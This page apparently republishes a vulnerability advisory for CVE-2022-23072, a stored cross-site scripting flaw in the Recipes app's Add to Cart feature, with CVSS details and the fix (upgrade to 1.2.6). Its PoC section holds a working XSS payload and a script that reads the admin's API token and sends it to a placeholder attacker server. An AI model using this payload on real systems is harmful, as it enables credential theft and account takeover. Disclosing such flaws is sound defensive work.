Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-23072: Mend Vulnerability Database

In Recipes, versions 1.0.5 through 1.2.5 are vulnerable to Stored Cross-Site Scripting (XSS), in “Add to Cartâ€? functionality. When a victim accesses the food list page, then adds a new Food with a malicious javascript payload in the ‘Name’ parameter and clicks on the Add to Shopping Cart icon, an XSS payload will trigger. A low privileged attacker will have the victim’s API key and can lead to admin’s account takeover.

CVE
#xss#vulnerability#web#js#java#auth

CVE-2022-23072

Date: January 11, 2022

Overview

In Recipes, versions 1.0.5 through 1.2.5 are vulnerable to Stored Cross-Site Scripting (XSS), in “Add to Cart” functionality. When a victim accesses the food list page, then adds a new Food with a malicious javascript payload in the ‘Name’ parameter and clicks on the Add to Shopping Cart icon, an XSS payload will trigger. A low privileged attacker will have the victim’s API key and can lead to admin’s account takeover.

Details

In Recipes, versions 1.0.5 through 1.2.5 are vulnerable to Stored Cross-Site Scripting (XSS), in “Add to Cart” functionality. When a victim accesses the food list page, then adds a new Food with a malicious javascript payload in the ‘Name’ parameter and clicks on the Add to Shopping Cart icon, an XSS payload will trigger. A low privileged attacker will have the victim’s API key and can lead to admin’s account takeover.

PoC Details

Access the application through a web browser and login as a user. Now navigate to the food list from the navigation bar. On the food list page, click on the plus ‘+’ icon. Under the name input field, enter the XSS payload given in the “POC Code” section below and save it. Then host the JavaScript file for fetching the victim’s API (the code for the JavaScript file can be found in the “POC Code” section below). In a new browser window, login as administrator and access the food list page. Now, click on the add to shopping cart icon, this will trigger the XSS payload and the attacker will receive the admin’s API key in the listener on the attacker hosting port.

PoC Code

XSS payload: 
<img src=a onerror="var x=document.createElement('script');x.src='<attacker_server>/api.js';document.body.appendChild(x);">

JavaScript file (api.js):
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/settings/',true);
req.send();
function handleResponse() {
t var a=this.responseText.match(/Authorization: Token.{1,}/)[0];
t a=a.split("Token ")[1];
t a=a.split("<")[0];
t console.log(a);
t var changeReq = new XMLHttpRequest();
     changeReq.open('get', '<attacker_server>:<attacker_port>/api='+a, false);
     changeReq.send()

Affected Environments

1.0.5 through 1.2.5

Prevention

Update version to 1.2.6 or higher

Language: Python

Good to know:

  • Severity Score
  • Weakness Type (CWE)
  • Top Fix

Cross-Site Scripting (XSS)

CWE-79

****Upgrade Version****

Upgrade to version 1.2.6

Learn More

  • CVSS v3.1

Base Score:

5.4

Attack Vector (AV):

Network

Attack Complexity (AC):

Low

Privileges Required (PR):

Low

User Interaction (UI):

Required

Scope (S):

Changed

Confidentiality ©:

Low

Integrity (I):

Low

Availability (A):

None

Related Resources (3)

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907